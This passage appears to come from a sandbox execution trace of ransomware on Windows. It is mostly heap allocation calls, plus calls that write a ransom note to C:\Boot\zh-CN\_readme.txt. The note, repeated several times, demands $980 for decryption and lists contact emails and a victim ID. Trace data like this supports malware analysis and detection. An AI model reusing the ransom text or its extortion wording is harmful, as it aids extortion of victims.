lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.941] PathFindFileNameW (pszPath="C:\\Boot\\zh-CN\\") returned="zh-CN\\" [0142.941] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0142.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.941] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.941] PathFindFileNameW (pszPath="") returned="" [0142.941] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0142.942] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0142.942] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3221ae8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0142.942] FreeLibrary (hLibModule=0x759d0000) returned 1 [0142.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.942] PathAppendW (in: pszPath="C:\\Boot\\zh-CN\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0142.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.942] PathFileExistsW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 0 [0142.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x9ad6f98 [0142.942] lstrcpyW (in: lpString1=0x9ad6f98, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" [0142.942] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d", lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" [0142.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9ab03c8 [0142.943] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\_readme.txt" (normalized: "c:\\boot\\zh-cn\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f0 [0142.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3221ae8 [0142.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x85b) returned 0x325d510 [0142.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", cchWideChar=-1, lpMultiByteStr=0x325d510, cbMultiByte=2139, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", lpUsedDefaultChar=0x0) returned 1116 [0142.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x321dfc8 [0142.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.943] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned 1115 [0142.943] WriteFile (in: hFile=0x6f0, lpBuffer=0x321dfc8*, nNumberOfBytesToWrite=0x45b, lpNumberOfBytesWritten=0x9dbfb64, lpOverlapped=0x0 | out: lpBuffer=0x321dfc8*, lpNumberOfBytesWritten=0x9dbfb64*=0x45b, lpOverlapped=0x0) returned 1 [0142.944] CloseHandle (hObject=0x6f0) returned 1 [0142.944] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321dfc8 | out: hHeap=0x620000) returned 1 [0142.944] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ab03c8 | out: hHeap=0x620000) returned 1 [0142.944] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ad6f98 | out: hHeap=0x620000) returned 1 [0142.944] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.944] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8cc9eb0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8cc9eb0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.945] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8cc9eb0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8cc9eb0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.945] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0142.945] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8cc9eb0, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8cc9eb0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8cc9eb0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0142.945] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8cc9eb0, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8cc9eb0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8cc9eb0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0142.945] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1730 | out: hHeap=0x620000) returned 1 [0142.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1730 [0142.945] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: 